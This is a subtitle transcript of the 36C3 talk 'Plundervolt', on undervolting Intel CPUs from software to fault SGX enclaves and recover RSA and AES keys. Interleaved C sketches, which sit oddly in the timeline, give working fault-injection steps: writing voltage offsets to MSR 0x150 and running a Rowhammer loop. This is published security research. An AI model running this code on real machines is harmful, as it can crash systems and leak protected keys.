
36C3 - Plundervolt: Flipping Bits from Software without Rowhammer

  • 0:20 - 0:22
    36C3 preroll music
  • 0:22 - 0:25
    Herald Angel: OK. Welcome to our next
    talk. It's called Flipping Bits from
  • 0:25 - 0:30
    Software without Rowhammer. A small
    reminder: Rowhammer was, and still is, a
  • 0:30 - 0:34
    software-based fault attack. It was
    published in 2015. There were
  • 0:34 - 0:40
    countermeasures developed and we are still
    in the process of deploying these
  • 0:40 - 0:46
    everywhere. And now our two speakers are
    going to talk about a new software-based
  • 0:46 - 0:56
    fault attack to execute commands inside
    the SGX environment. Our speakers,
  • 0:56 - 1:05
    Professor Daniel Gruss from the University
    of Graz and Kit Murdock researching at the
  • 1:05 - 1:11
    University of Birmingham. The content of
    this talk is actually her first
  • 1:11 - 1:17
    published paper, accepted at IEEE
    Security and Privacy next
  • 1:17 - 1:21
    year. In case you do not come from the
    academic world: this is
  • 1:21 - 1:23
    always a big deal, and if it is your first
    paper, even more so. Please welcome
  • 1:23 - 1:28
    them both, give them a round of applause
    and enjoy the talk.
  • 1:28 - 1:31
    Applause
  • 1:31 - 1:38
    Kit Murdock: Thank you. Hello. Let's get
    started. This is my favorite recent
  • 1:38 - 1:45
    attack. It's called CLKscrew. And the
    reason that it's my favorite is it created
  • 1:45 - 1:50
    a new class of fault attacks. Daniel
    Gruss: Fault attacks. I, I know that.
  • 1:50 - 1:54
    Fault attacks, you take these
    oscilloscopes and check the voltage line
  • 1:54 - 1:58
    and then you drop the voltage for a f....
    Kit: No, you see, this is why this one is
  • 1:58 - 2:05
    cool because you don't need any equipment
    at all. Adrian Tang. He created this
  • 2:05 - 2:10
    wonderful attack that uses DVFS. What is
    that?
  • 2:10 - 2:13
    Daniel: DVFS? I don't know, don't
    violate format specifications.
  • 2:13 - 2:19
    Kit: I asked my boyfriend this morning
    what he thought DVFS stood for and he said
  • 2:19 - 2:22
    Darth Vader fights Skywalker.
    Laughter
  • 2:22 - 2:26
    Kit: I'm also wearing his t-shirt
    specially for him as well.
  • 2:26 - 2:30
    Daniel: Maybe, maybe this is more
    technical, maybe Dazzling Volt For
  • 2:30 - 2:35
    Security, like SGX.
    Kit: No, it's not that either. Mine was,
  • 2:35 - 2:40
    the one I came up with this morning was: Drink
    Vodka Feel Silly.
  • 2:40 - 2:43
    Laughter
    Kit: It's not that either. It stands for
  • 2:43 - 2:49
    dynamic voltage and frequency scaling. And
    what that means really simply is changing
  • 2:49 - 2:53
    the voltage and changing the frequency of
    your CPU. Why do you want to do this? Why
  • 2:53 - 2:58
    would anyone want to do this? Well, gamers
    want fast computers. I am sure there are a
  • 2:58 - 3:03
    few people out here who will want a really
    fast computer. Cloud servers want high
  • 3:03 - 3:08
    assurance and low running costs. And what
    do you do if your hardware gets hot?
  • 3:08 - 3:13
    You're going to need to modify them. And
    actually finding a voltage and frequency
  • 3:13 - 3:18
    that work together is pretty difficult.
    And so what the manufacturers have done to
  • 3:18 - 3:23
    make this easier, is they've created a way
    to do this from software. They created
  • 3:23 - 3:29
    memory mapped registers. You modify this
    from software and it has an impact on the
  • 3:29 - 3:35
    hardware. And that's what this wonderful
    CLKscrew attack did. But they found
  • 3:35 - 3:42
    something else out, which is you may have
    heard of: TrustZone. TrustZone is an
  • 3:42 - 3:48
    enclave in ARM chips that should be able
    to protect your data. But if you can
  • 3:48 - 3:52
    modify the frequency and voltage of the
    whole core, then you can modify it for
  • 3:52 - 3:59
    both TrustZone and normal code. And this
    is their attack. In software they modified
  • 3:59 - 4:05
    the frequency to make it outside of the
    normal operating range. And they induced
  • 4:05 - 4:12
    faults. And so in an ARM chip running on a
    mobile phone, they managed to get out an
  • 4:12 - 4:18
    AES key from within TrustZone. They
    should not be able to do that. They were
  • 4:18 - 4:23
    able to trick TrustZone into loading a
    self-signed app. You should not be able to
  • 4:23 - 4:32
    do that. That made this ARM attack really
    interesting. This year another attack came
  • 4:32 - 4:40
    out called VoltJockey. This also attacked
    ARM chips. But instead of looking at
  • 4:40 - 4:49
    frequency on ARM chips, they were looking
    at voltage on ARM chips. We're thinking,
  • 4:49 - 4:57
    what about Intel?
    Daniel: OK, so Intel. Actually, I know
  • 4:57 - 5:02
    something about Intel because I had this
    nice laptop from HP. I really liked it,
  • 5:02 - 5:07
    but it had this problem that it was getting
    too hot all the time and I couldn't even
  • 5:07 - 5:13
    work without it shutting down all the time
    because of the heat problem. So what I did
  • 5:13 - 5:18
    was I undervolted the CPU and actually
    this worked for me for several years. I
  • 5:18 - 5:22
    used this undervolted for several years.
    You can also see this, I just took this
  • 5:22 - 5:27
    from somewhere on the Internet and they
    compared with undervolting and without
  • 5:27 - 5:32
    undervolting. And you can see that the
    benchmark score improves by undervolting
  • 5:32 - 5:39
    because you don't run into the thermal
    throttling that often. So there are
  • 5:39 - 5:44
    different tools to do that. On Windows you
    could use RMClock, there's also
  • 5:44 - 5:48
    ThrottleStop. On Linux there's the linux-
    intel-undervolt GitHub repository.
  • 5:48 - 5:53
    Kit: And there's one more, actually.
    Adrian Tang, who, I don't know if you know,
  • 5:53 - 5:59
    I'm a bit of a fan of. He was the lead author on
    CLKscrew. He wrote his PhD thesis and
  • 5:59 - 6:03
    in the appendix he talked about
    undervolting on Intel machines and how you
  • 6:03 - 6:08
    do it. And I wish I'd read that before I
    started the paper. That would have saved
  • 6:08 - 6:12
    an awful lot of time. But thank you to the
    people on the Internet for making my life
  • 6:12 - 6:18
    a lot easier, because what we discovered
    was there is this magic model-specific
  • 6:18 - 6:27
    register and it's called 0x150. And this
    enables you to change the voltage. The
  • 6:27 - 6:31
    people on the Internet did the work for
    me. So I know how it works. You first of
  • 6:31 - 6:37
    all tell it the plane index: what it is you
    want to raise or lower the
  • 6:37 - 6:43
    voltage. We discovered that the core and
    the cache are on the same plane. So you
  • 6:43 - 6:47
    have to modify them both, but it has no
    extra effect, they're tied together. I guess in the
  • 6:47 - 6:51
    future they'll be separate. Then you
    modify the offset to say, I want to raise
  • 6:51 - 6:57
    it by this much or lower it by this much.
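    What the people on the Internet worked out can be sketched
    in C roughly like this. The field layout is an assumption
    taken from public write-ups and community reverse
    engineering, not an official Intel specification:

        #include <stdint.h>

        /* Assumed layout of MSR 0x150 (voltage offset control):
         *   bit 63      always set
         *   bits 42:40  voltage plane (0 = core, 2 = cache, ...)
         *   bit 36      1 = write the offset, 0 = read it back
         *   bit 32      "offset valid"
         *   bits 31:21  signed 11-bit offset in steps of 1/1024 V */
        static uint64_t encode_voltage_offset(unsigned plane, int millivolts)
        {
            int steps = (millivolts * 1024) / 1000;   /* mV -> 1/1024 V steps */
            uint64_t offset = ((uint64_t)steps & 0x7FF) << 21;
            return 0x8000001100000000ULL | ((uint64_t)plane << 40) | offset;
        }

    A negative offset, e.g. -252 mV, undervolts; per the same
    write-ups, the encoding with bit 36 clear reads the current
    offset back.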
    So I thought, let's have a go. Let's write
  • 6:57 - 7:06
    a little bit of code. Here is the code.
    The smart people amongst you may have
  • 7:06 - 7:16
    noticed something. I suspect, even with my
    appalling C, even I would recognize that
  • 7:16 - 7:21
    that loop should never exit. I'm just
    multiplying the same thing again and again
  • 7:21 - 7:25
    and again and again and again and
    expecting it to exit. That shouldn't
  • 7:25 - 7:32
    happen. But let's look at what happened.
    So I'm gonna show you what I did. Oh..
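    The loop in question might look roughly like this minimal C
    sketch (a reconstruction for illustration; the multiplier
    constant is made up, and volatile keeps the compiler from
    folding the multiplication away):

        #include <stdint.h>
        #include <stdio.h>

        int main(void)
        {
            volatile uint64_t a = 0xdeadbeef;
            volatile uint64_t b = 0x1122334455667788ULL;
            const uint64_t correct = a * b;   /* reference product */
            uint64_t iterations = 0, faulty;

            /* Multiply the same operands over and over; this loop
             * can only exit if the CPU computes a wrong product. */
            do {
                faulty = a * b;
                iterations++;
            } while (faulty == correct);

            printf("bit flip after %llu iterations: 0x%llx != 0x%llx\n",
                   (unsigned long long)iterations,
                   (unsigned long long)faulty,
                   (unsigned long long)correct);
            return 0;
        }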
  • 7:32 - 7:42
    There we go. So the first thing I'm gonna
    do is I'm going to set the frequency to be
  • 7:42 - 7:46
    one thing because I'm gonna play with
    voltage and if I'm gonna play with
  • 7:46 - 7:51
    voltage, I want the frequency to be
    set. So, it's quite easy using cpupower:
  • 7:51 - 7:57
    you set the maximum and the minimum to be
    1 gigahertz. And now my machine is running
  • 7:57 - 8:01
    at exactly 1 gigahertz. Now we'll look at
    the bit of code that you need to
  • 8:01 - 8:05
    undervolt, again I didn't do the work,
    thank you to the people on the internet
  • 8:05 - 8:12
    for doing this. You load the msr module into the
    kernel and let's have a look at the code.
  • 8:12 - 8:21
    Does that look right? Oh, it does, looks
    much better up there. Yes, it's that one
  • 8:21 - 8:27
    line of code. That is the one line of code
    you need to open and then we're going to
  • 8:27 - 8:33
    write to it. And again, oh why is it doing
    that? We have a touch sensitive screen
  • 8:33 - 8:53
    here. Might touch it again. That's the
    line of code that's gonna open it and
  • 8:53 - 8:56
    that's how you write to it. And again, the
    people on the Internet did the work for me
  • 8:56 - 8:59
    and told me how I had to write that. So
    what I can do here is I'm just going to
  • 8:59 - 9:04
    undervolt and I'm gonna undervolt,
    multiplying deadbeef by this really big
  • 9:04 - 9:09
    number. I'm starting at minus two hundred
    and fifty two millivolts. And we're just
  • 9:09 - 9:11
    going to see if I ever get out of this
    loop.
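    Putting the demo together: the frequency is pinned first
    (e.g. cpupower frequency-set -d 1GHz -u 1GHz), then the
    offset is written through the msr device. A sketch of that
    open-and-write step, reusing encode_voltage_offset() from
    the earlier sketch (assumes root, a loaded msr kernel
    module, and that the cache plane index is 2):

        #include <fcntl.h>
        #include <stdint.h>
        #include <stdio.h>
        #include <unistd.h>

        int main(void)
        {
            /* /dev/cpu/N/msr exposes the MSRs of CPU N; the file
             * offset passed to pwrite() selects the MSR number. */
            int fd = open("/dev/cpu/0/msr", O_RDWR);
            if (fd < 0) { perror("open"); return 1; }

            /* -252 mV on the core plane (0) and on the cache
             * plane (assumed index 2), since they sit together. */
            uint64_t val = encode_voltage_offset(0, -252);
            if (pwrite(fd, &val, sizeof val, 0x150) != sizeof val)
                perror("pwrite core");
            val = encode_voltage_offset(2, -252);
            if (pwrite(fd, &val, sizeof val, 0x150) != sizeof val)
                perror("pwrite cache");

            close(fd);
            return 0;
        }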
  • 9:11 - 9:14
    Daniel: But surely the system would just
    crash, right?
  • 9:14 - 9:22
    Kit: You'd hope so, wouldn't you? Let's
    see, there we go! We got a fault. I was a
  • 9:22 - 9:25
    bit gobsmacked when that happened because
    the system didn't crash.
  • 9:25 - 9:30
    Daniel: So that doesn't look too good. So
    the question now is, what is the... So you
  • 9:30 - 9:33
    show some voltage here, some undervolting.
    Kit: Yeah
  • 9:33 - 9:37
    Daniel: What undervolting is actually
    required to get a bit flip?
  • 9:37 - 9:41
    Kit: We did a lot of tests. We didn't just
    multiply by deadbeef. We also multiplied
  • 9:41 - 9:45
    by random numbers. So here I'm going to
    just generate two random numbers. One is
  • 9:45 - 9:50
    going up to 0xffffff, one is going up to
    0xff. I'm just going to try different, again
  • 9:50 - 9:57
    I'm going to try undervolting to see if I
    get different bit flips. And again, I got
  • 9:57 - 10:04
    the same bit flipped, so I'm getting the
    same one single bit flip there. Okay, so
  • 10:04 - 10:08
    maybe it's only ever going to be one bit
    flip. Ah, I got a different bit flip and
  • 10:08 - 10:12
    again a different bit flip and it's,
    you'll notice they always appear to be
  • 10:12 - 10:17
    bits together next to one another. So to
    answer Daniel's question, I stressed my
  • 10:17 - 10:23
    machine a lot in the process of doing
    this, but I wanted to know what were good
  • 10:23 - 10:29
    values to undervolt at. And here they are.
    We tried, for all the frequencies:
  • 10:29 - 10:33
    what was the base voltage? And when
    was the point at which we got the first
  • 10:33 - 10:38
    fault? And once we'd done that, it made
    everything really easy. We just made sure
  • 10:38 - 10:41
    we didn't go under that and end up with
    a kernel panic or the machine crashing.
  • 10:41 - 10:47
    Daniel: So this is already great. I think
    this looks like it is exploitable and the
  • 10:47 - 10:54
    first thing that you need when you are
    working on a vulnerability is the name and
  • 10:54 - 11:01
    the logo and maybe a website. Everything
    like that. And real people on the Internet
  • 11:01 - 11:06
    agree with me. Like this tweet.
    Laughter
  • 11:06 - 11:12
    Daniel: Yes. So we need a name and a logo.
    Kit: No, no, we don't need it. Come on
  • 11:12 - 11:15
    then. Go on then. What is your idea?
    Daniel: So I thought this is like, it's
  • 11:15 - 11:21
    like Rowhammer. We are flipping bits, but
    with voltage. So I called it Volthammer
  • 11:21 - 11:25
    and I already have a logo for it.
    Kit: We're not, we're not giving it a
  • 11:25 - 11:28
    logo.
    Daniel: No, I think we need a logo because
  • 11:28 - 11:35
    people can relate more to the images
    there, to the logo that we have. Reading a
  • 11:35 - 11:39
    word is much more complicated than seeing
    a logo somewhere. It's better for
  • 11:39 - 11:45
    communication. You make it easier to talk
    about your vulnerability. Yeah? And the
  • 11:45 - 11:50
    name, same thing. How would you like
    to call it? Like undervolting on Intel to
  • 11:50 - 11:54
    induce flips in multiplications to then
    run an exploit? No, that's not a good
  • 11:54 - 12:02
    vulnerability name. And speaking of the
    name, if we choose a fancy name, we might
  • 12:02 - 12:06
    even make it into TV shows like
    Rowhammer.
  • 12:06 - 12:12
    Video Clip 1A: The hacker used a DRAM
    Rowhammer exploit to gain kernel privileges.
  • 12:12 - 12:15
    Video Clip 1B: HQ, yeah we've got
    something.
  • 12:15 - 12:21
    Daniel: So this was in Designated Survivor
    in March 2018 and this guy just got shot.
  • 12:21 - 12:26
    So hopefully we won't get shot but
    actually we have also been working. So my
  • 12:26 - 12:33
    group has been working on Rowhammer and
    presented this in 2015 here at CCC, in
  • 12:33 - 12:38
    Hamburg back then. It was Rowhammer.js
    and we called it root privileges for web
  • 12:38 - 12:41
    apps because we showed that you can do
    this from JavaScript in a browser. Looks
  • 12:41 - 12:44
    pretty much like this, we hammered the
    memory a bit and then we see bit flips
  • 12:44 - 12:50
    in the memory. So how does this work?
    Because this is
  • 12:50 - 12:53
    the only
    other software-based fault attack that we
  • 12:53 - 12:59
    know. The others are related to DVFS and
    this is a different effect. So what we
  • 12:59 - 13:04
    do here is we look at the DRAM and the
    DRAM is organized in multiple rows and we
  • 13:04 - 13:10
    will access these rows. These rows consist
    of so-called cells, which are capacitors
  • 13:10 - 13:14
    and transistors each. And they store one
    bit of information each. And the row
  • 13:14 - 13:18
    buffer matches the row size, usually something
    like eight kilobytes. And then when you
  • 13:18 - 13:22
    read something, you copy it to the row
    buffer. So it works pretty much like this:
  • 13:22 - 13:26
    You read from a row, you copy it to the
    row buffer. The problem now is, these
  • 13:26 - 13:31
    capacitors leak over time so you need to
    refresh them frequently. And they have
  • 13:31 - 13:38
    also a maximum refresh interval defined in
    a standard to guarantee data integrity.
  • 13:38 - 13:43
    Now the problem is that cells leak fast
    upon proximate accesses, and that means if
  • 13:43 - 13:49
    you access two locations in proximity to a
    third location, then the third location
  • 13:49 - 13:54
    might flip a bit without accessing it. And
    this has been exploited in different exploits.
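    The hammering itself is just a tight loop of uncached
    accesses to two aggressor addresses; a minimal sketch
    (assuming x86 and clflush; picking addresses that map to
    rows adjacent to the victim row happens elsewhere):

        #include <emmintrin.h>   /* _mm_clflush */
        #include <stdint.h>

        /* Read both aggressor rows repeatedly, flushing them from
         * the cache so every access really goes out to DRAM. */
        static void hammer(volatile uint64_t *aggr1,
                           volatile uint64_t *aggr2, long reps)
        {
            for (long i = 0; i < reps; i++) {
                (void)*aggr1;
                (void)*aggr2;
                _mm_clflush((const void *)aggr1);
                _mm_clflush((const void *)aggr2);
            }
        }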
  • 13:54 - 13:59
    So maybe we can use some of them.
  • 13:59 - 14:03
    The usual strategies here are searching
    for a page with a bit flip. So you search
  • 14:03 - 14:08
    for it and then you find some. Ah, there
    is a flip here. Then you release the page
  • 14:08 - 14:13
    with the flip in the next step. Now this
    memory is free and now you allocate a lot
  • 14:13 - 14:18
    of target pages, for instance, page
    tables, and then you hope that the target
  • 14:18 - 14:22
    page is placed there. If it's a page
    table, for instance, like this and you
  • 14:22 - 14:27
    induce a bit flip. So before, it was
    pointing to a user page, then it was
  • 14:27 - 14:33
    pointing to no page at all because we
    maybe unmapped it. And the page where we
  • 14:33 - 14:38
    use the bit flip now is actually the one
    storing all of the PTEs here. So the one
  • 14:38 - 14:43
    in the middle is stored down there. And
    this one now has a bit flip and then our
  • 14:43 - 14:50
    pointer to our own user page changes due
    to the bit flip and points to hopefully
  • 14:50 - 14:55
    another page table because we filled that
    memory with page tables. Another direction
  • 14:55 - 15:02
    that we could go here is flipping bits in
    code. For instance, if you think about a
  • 15:02 - 15:07
    password comparison, you might have a jump
    equal check here and, for the jump equal check,
  • 15:07 - 15:13
    if you flip one bit, it transforms into a
    different instruction. And fortunately, oh
  • 15:13 - 15:18
    this already looks interesting. Ah,
    Perfect. Changing the password check into a
  • 15:18 - 15:26
    password incorrect check. I will always be
    root. And yeah, that's basically it. So
  • 15:26 - 15:31
    these are two directions that we might
    look at for Rowhammer. That's also maybe
  • 15:31 - 15:35
    a question for Rowhammer: why would we
    even care about other fault attacks?
  • 15:35 - 15:40
    Because Rowhammer works on DDR3, it
    works on DDR4, it works on ECC memory.
  • 15:40 - 15:48
    Kit: Does it, how does it deal with SGX?
    Daniel: Ahh yeah, yeah SGX. Ehh, yes. So
  • 15:48 - 15:51
    maybe we should first explain what SGX is.
    Kit: Yeah, go for it.
  • 15:51 - 15:57
    Daniel: SGX is a so-called TEE, a trusted
    execution environment on Intel processors
  • 15:57 - 16:02
    and Intel designed it this way that you
    have an untrusted part and this runs on
  • 16:02 - 16:06
    top of an operating system, inside an
    application. And inside the application
  • 16:06 - 16:11
    you can now create an enclave and the
    enclave runs in a trusted part, which is
  • 16:11 - 16:17
    supported by the hardware. The hardware is
    the trust anchor for this trusted enclave
  • 16:17 - 16:20
    and the enclave, now you can from the
    untrusted part, you can call into the
  • 16:20 - 16:25
    enclave via a call gate, pretty much like a
    system call. And in there you execute a
  • 16:25 - 16:32
    trusted function. Then you return to this
    untrusted part and then you can continue
  • 16:32 - 16:35
    doing other stuff. And the operating
    system has no direct access to this
  • 16:35 - 16:40
    trusted part. This is also protected
    against all kinds of other attacks. For
  • 16:40 - 16:44
    instance, physical attacks. If you look at
    the memory that it uses, maybe I have 16
  • 16:44 - 16:50
    gigabytes of RAM. Then there is a small
    region for the EPC, the enclave page
  • 16:50 - 16:55
    cache, the memory that enclaves use and
    it's encrypted and integrity protected and
  • 16:55 - 17:00
    I can't tamper with it. So for instance,
    if I want to mount a cold boot attack,
  • 17:00 - 17:04
    pull out the DRAM, put it in another
    machine and read out what content it has.
  • 17:04 - 17:08
    I can't do that because it's encrypted.
    And I don't have the key. The key is in
  • 17:08 - 17:15
    the processor. Quite bad. So, what happens
    if we have bit flips in the EPC? Good
  • 17:15 - 17:22
    question. We tried that. The integrity
    check fails. It locks up the memory
  • 17:22 - 17:27
    controller, which means no further memory
    accesses whatsoever run through this
  • 17:27 - 17:34
    system. Everything stays where it is and
    the system halts basically. It's not an
  • 17:34 - 17:41
    exploit, it's just a denial of service.
    Kit: Huh. So maybe SGX can save us. So
  • 17:41 - 17:47
    what I want to know is: Rowhammer clearly
    failed because of the integrity check.
  • 17:47 - 17:52
    Is my attack, where I can flip bits,
    gonna work inside SGX?
  • 17:52 - 17:55
    Daniel: I don't think so because they
    have integrity protection, right?
  • 17:55 - 18:00
    Kit: So what I'm gonna do is run the same
    thing twice. The right-hand side is user
  • 18:00 - 18:04
    space, the left-hand side is the
    enclave. As you can see, I'm running at
  • 18:04 - 18:12
    minus 261 millivolts. No error. Minus 262.
    No error. Minus 2..., fingers crossed we
  • 18:12 - 18:21
    don't get a kernel panic. Do you see that
    thing at the bottom? That's a bit flip
  • 18:21 - 18:25
    inside the enclave. Oh, yeah.
    Daniel: That's bad.
  • 18:25 - 18:30
    Applause
    Kit: Thank you. Yeah and it's the same
  • 18:30 - 18:34
    bit flip that I was getting in user space,
    which is also really interesting.
  • 18:34 - 18:38
    Daniel: I have an idea. So, it's
    surprising that it works right. But I have
  • 18:38 - 18:45
    an idea. This is basically doing the same
    thing as CLKscrew. But on SGX, right?
  • 18:45 - 18:47
    Kit: Yeah.
    Daniel: And I thought maybe you didn't
  • 18:47 - 18:52
    like the previous logo, maybe it was just
    too much. So I came up with something more
  • 18:52 - 18:53
    simple...
    Kit: You've come up with a new... He's
  • 18:53 - 18:56
    come up with a new name.
    Daniel: Yes, SGX Screw. How do you like
  • 18:56 - 18:59
    it?
    Kit: No, we don't even have an attack. We
  • 18:59 - 19:02
    can't have a logo before we have an
    attack.
  • 19:02 - 19:07
    Daniel: The logo is important, right? I
    mean, how would you present this on a
  • 19:07 - 19:09
    website
    without a logo?
  • 19:09 - 19:12
    Kit: Well, first of all, I need an attack.
    What am I going to attack with this?
  • 19:12 - 19:15
    Daniel: I have an idea what we could
    attack. So, for instance, we could attack
  • 19:15 - 19:22
    crypto, RSA. RSA is a crypto algorithm.
    It's a public key crypto algorithm. And
  • 19:22 - 19:28
    you can encrypt or sign messages. You can
    send this over an untrusted channel. And
  • 19:28 - 19:36
    then you can also verify. So this is
    actually a typo, it should be decrypt
  • 19:36 - 19:43
    there: you encrypt or verify messages with a
    public key, and decrypt or sign messages with a
  • 19:43 - 19:54
    private key. So how does this work? Yeah,
    basically it's based on exponentiation modulo a
  • 19:54 - 20:01
    number and this number is computed from
    two prime numbers. So you, for the
  • 20:01 - 20:09
    signature part, which is similar to the
    decryption basically, you take the hash of
  • 20:09 - 20:18
    the message and then take it to the power
    of d modulo n, the public modulus, and
  • 20:18 - 20:26
    then you have the signature and everyone
    can, later on,
  • 20:26 - 20:34
    verify this because the exponent part
    is public. And n is also public, so we can
  • 20:34 - 20:40
    later on do this. Now there is one
    optimization which is quite nice, which is
  • 20:40 - 20:45
    Chinese remainder theorem. And this part
    is really expensive. It takes a long time.
  • 20:45 - 20:51
    So it's a lot faster, if you split this in
    multiple parts. For instance, if you split
  • 20:51 - 20:56
    it in two parts, you do two of those
    exponentiations, but with different
  • 20:56 - 21:02
    numbers, with smaller numbers and then it's
    cheaper. It takes fewer rounds. And if you
  • 21:02 - 21:07
    do that, you of course have to adapt the
    formula up here to compute the signature
  • 21:07 - 21:13
    because you now put it together out of
    the two pieces of the signature that you
  • 21:13 - 21:19
    compute. OK, so this looks quite
    complicated, but the point is we want to
  • 21:19 - 21:27
    mount a fault attack on this. So what
    happens if we fault this? Let's assume we
  • 21:27 - 21:36
    have two signatures which are not
    identical. Right, s and s', and we
  • 21:36 - 21:41
    basically only need to know that in one of
    them, a fault occurred. So the first is
  • 21:41 - 21:45
    something, the other is something else. We
    don't care. But what you see here is that
  • 21:45 - 21:52
    both are something multiplied by q, plus s2. And if
    you subtract one from the other, what do
  • 21:52 - 21:57
    you get? You get something multiplied with
    q. There is something else that is
  • 21:57 - 22:03
    a multiple of q, which is n = p*q, and n is
    public. So what we can do now is we can
  • 22:03 - 22:10
    compute the greatest common divisor of
    this and n and get q.
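    Written out, this is the standard Bellcore-style fault
    attack on RSA-CRT (the recombination is Garner's formula,
    with s1 the half-signature mod p, s2 the half mod q, and
    iq = q^(-1) mod p; the fault is assumed to hit only the
    s1 half):

        s  = s2 + q * (iq * (s1  - s2) mod p)     correct signature
        s' = s2 + q * (iq * (s1' - s2) mod p)     faulty signature

        s - s' = q * t   for some integer t, hence
        gcd(s - s', n) = q   and   p = n / q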
  • 22:10 - 22:15
    Kit: Okay. So I'm interested to see if...
    I didn't understand a word of that, but
  • 22:15 - 22:20
    I'm interested to see if I can use this to
    mount an attack. So how am I going to do
  • 22:20 - 22:26
    this? Well, I'll write a little RSA
    decrypt program and what I'll do is I use
  • 22:26 - 22:32
    the same bit of multiplication that I've
    been using before. And when I get a bit
  • 22:32 - 22:39
    flip, then I'll do the decryption. All
    this is happening inside SGX, inside the
  • 22:39 - 22:44
    enclave. So let's have a look at this.
    First of all, I'll show you the code that
  • 22:44 - 22:52
    I wrote, again copied from the Internet.
    Thank you. So there it is, I'm going to
  • 22:52 - 22:56
    trigger the fault. I'm going to wait for
    the triggered fault, then I'm going to do
  • 22:56 - 23:01
    a decryption. Well, let's have a quick
    look at the code, which should be exactly
  • 23:01 - 23:05
    the same as it was right at the very
    beginning when we started this. Yeah.
  • 23:05 - 23:10
    There's my deadbeef written slightly
    differently. But there is my deadbeef. So,
  • 23:10 - 23:14
    now this is ever so slightly messy on the
    screen, but I hope you're going to see
  • 23:14 - 23:23
    this. So minus 239. Fine. Still fine.
    Still fine. I'll just pause there. You can
  • 23:23 - 23:27
    see at the bottom I've written "meh - all
    fine.", if you're wondering. So what we're
  • 23:27 - 23:33
    looking at here is a correct decryption
    and you can see inside the enclave, I'm
  • 23:33 - 23:38
    initializing p and I'm initializing q. And
    those are part of the private key. I
  • 23:38 - 23:44
    shouldn't be able to get those. So minus 239
    isn't really working. Let's try going up
  • 23:44 - 23:49
    to minus 240. Oh oh oh oh! RSA error, RSA
    error. Exciting!
  • 23:49 - 23:52
    Daniel: Okay, so this should work for the
    attack then.
  • 23:52 - 23:57
    Kit: So let's have a look, again. I copied
    somebody's attack from the Internet, which
  • 23:57 - 24:04
    they very kindly published. It's called the Lenstra
    attack. And again, I got an output.
  • 24:04 - 24:08
    I don't know what it is because I didn't
    understand any of that crypto stuff.
  • 24:08 - 24:10
    Daniel: Me neither.
    Kit: But let me have a look at the source
  • 24:10 - 24:16
    code and see if that exists anywhere in
    the source code inside the enclave. It
  • 24:16 - 24:22
    does. I found p. And if I found p, I can
    find q. So just to summarise what I've
  • 24:22 - 24:32
    done, from a bit flip I have got the
    private key out of the SGX enclave and I
  • 24:32 - 24:36
    shouldn't be able to do that.
    Daniel: Yes, yes and I think I have an
  • 24:36 - 24:40
    idea. So you didn't like the previous...
    Kit: Ohh, I know where this is going. Yes.
  • 24:40 - 24:46
    Daniel: ...didn't like the previous name.
    So I came up with something more cute and
  • 24:46 - 24:53
    relatable, maybe. So I thought, this is an
    attack on RSA. So I called it Mufarsa.
  • 24:53 - 24:58
    Laughter
    Daniel: My Undervolting Fault Attack On
  • 24:58 - 25:00
    RSA.
    Kit: That's not even a logo. That's just a
  • 25:00 - 25:02
    picture of a lion.
    Daniel: Yeah, yeah it's, it's sort of...
  • 25:02 - 25:05
    Kit: Disney are not going to let us use
    that.
  • 25:05 - 25:07
    Laughter
    Kit: Well it's not, is it Star Wars? No,
  • 25:07 - 25:11
    I don't know. OK. OK, so Daniel, I really
    enjoyed it.
  • 25:11 - 25:14
    Daniel: I don't think you will like any of
    the names I suggest.
  • 25:14 - 25:18
    Kit: Probably not. But I really enjoyed
    breaking RSA. So what I want to know is
  • 25:18 - 25:19
    what else can I break?
    Daniel: Well...
  • 25:19 - 25:23
    Kit: Give me something else I can break.
    Daniel: If you don't like the RSA part, we
  • 25:23 - 25:28
    can also take other crypto. I mean there
    is AES for instance, AES is a symmetric
  • 25:28 - 25:34
    key crypto algorithm. Again, you encrypt
    messages, you transfer them over a public
  • 25:34 - 25:40
    channel, this time with both sides having
    the key. You can also use that for
  • 25:40 - 25:48
    storage. AES internally uses a 4x4 state
    matrix of 16 bytes and it runs through
  • 25:48 - 25:54
    ten rounds: an S-box, which
    basically replaces each byte by another byte,
  • 25:54 - 25:59
    some shifting of rows in this matrix, some
    mixing of the columns, and then the round
  • 25:59 - 26:03
    key is added, which is computed from the
    AES key that you provided to the
  • 26:03 - 26:09
    algorithm. And if we look at the last
    three rounds because we want to, again,
  • 26:09 - 26:12
    mount a fault attack, and there are
    different differential fault attacks on
  • 26:12 - 26:18
    AES. If you look at the last rounds,
    because the way this algorithm works is
  • 26:18 - 26:23
    it propagates changes, differences,
    through the algorithm. If you look at
  • 26:23 - 26:28
    the state matrix, which only has a
    difference in the top left corner, then
  • 26:28 - 26:34
    this is how the state will propagate
    through the 9th and 10th round. And you
  • 26:34 - 26:42
    can put up formulas to compute possible
    values for the state up there. If you have
  • 26:42 - 26:48
    different, if you have encryptions, which
    only have a difference there in exactly
  • 26:48 - 26:57
    that single state byte. Now, how does this
    work in practice? Well, today everyone is
  • 26:57 - 27:02
    using AES-NI because that's super fast.
    That's, again, an instruction set
  • 27:02 - 27:08
    extension by Intel and it's super fast.
    Kit: Oh okay, I want to have a go. Right,
  • 27:08 - 27:12
    so let me have a look if I can break some
    of these AES-NI instructions. So I'm going to
  • 27:12 - 27:16
    come at this slightly differently. Last
    time I waited for a multiplication fault,
  • 27:16 - 27:20
    I'm going to do something slightly
    different. What I'm going to do is put in
  • 27:20 - 27:27
    a loop two AES encryptions. And I wrote
    this using Intel's code, I should say I we
  • 27:27 - 27:33
    wrote this using Intel's code, example
    code. This should never fault. And we know
  • 27:33 - 27:37
    what we're looking for. What we're looking
    for is a fault in the eighth round. So
  • 27:37 - 27:42
    let's see if we get faults with this. So
    the first thing is I'm going to start at
  • 27:42 - 27:48
    minus 262 millivolt. What's interesting is
    that you have to undervolt more when it's
  • 27:48 - 27:57
    cold so you can tell at what time of day I
    ran these. Oh I got a fault, I got a fault.
  • 27:57 - 28:02
    Well, unfortunately... where did that happen?
    That's actually in the fourth round. I'm,
  • 28:02 - 28:04
    I'm obviously, eh, fifth round, okay.
    Daniel: You can't do anything with that.
  • 28:04 - 28:10
    Kit: You can't do anything, again in the
    fifth round. Can't do anything with that,
  • 28:10 - 28:15
    fifth round again. Oh! Oh we got one. We
    got one in the eighth round. And so it
  • 28:15 - 28:21
    means I can take these two ciphertexts and
    I can use the differential fault attack. I
  • 28:21 - 28:27
    actually ran this twice in order to get
    two pairs of faulty output because it made
  • 28:27 - 28:31
    it so much easier. And again, thank you to
    somebody on the Internet for having
  • 28:31 - 28:35
    written a differential fault analysis
    attack for me. You don't, you don't need
  • 28:35 - 28:39
    two, but it just makes it easy for the
